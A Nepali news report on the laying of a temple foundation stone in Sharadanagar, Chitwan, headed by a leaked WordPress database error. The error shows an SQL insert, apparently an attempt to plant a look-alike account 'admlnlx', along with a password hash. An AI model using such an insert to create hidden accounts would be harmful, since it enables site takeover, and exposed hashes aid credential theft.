WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3wJq4ZYJ0Fjs/mYF1QEelwcYmNB/H0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 05:06:11', '', 'admlnlx', 'admlnlx')
चितवन, माघ १९–
चित्रवन नगरपालिका–३ शारदानगरमा विष्णुनारायाण मन्दिरको शिलन्यास गरिएको छ । शारदानगरका रहेको कालिका मन्दिरको प्रागंणमा बुधबार एक कार्यक्रमको आयोजना गरि सांसद बिष्णुमाया परियारले मन्दिरको शिलन्यास गर्नुभएको हो ।
साँसद परियारले काठमाण्डौको बुढानिलकण्ठमा रहेको नारायण मन्दिरको जस्तै आकारमा मन्दिर निर्माण गरिने जानकारी दिनुभयो ।
शिलान्यास कार्यक्रममा बोल्दै चित्रवन नगरपालिकाका कार्यकारी अधिकृत रामचन्द्र अर्यालले पश्चिम चितवनमा रहेका मन्दिर र गुम्वाको संरक्षण गर्नु सबैको कर्तव्य रहेको बताउनुभयो । उहाँले धार्मिक पर्यटन विकास गर्न यस क्षेत्रका स्थानीयको ठूलो भुमिका रहेको बताउदै मन्दिर परिसरमा तारवार अथवा कम्पाउण्ड वाल निर्माण गर्नुपर्ने आवश्यकता रहेको बताउनु भयो ।
२०२२ सालमा निर्माण भएको कालिका मन्दिरको परिसरमा बिशाल कालिका भगवतिको मन्दिर र गणेशको मन्दिर रहेको छ । शिंहबहादुर तामाङको सभापतित्वमा भएको कार्यक्रममा पश्चिम चितवन नागरिक समाजका संयोजक कर्णबहादुर गुरुङ, बिष्णु ढकाललगायतले शुभकामना मन्तब्य ब्यक्त गर्नुभएको थियो ।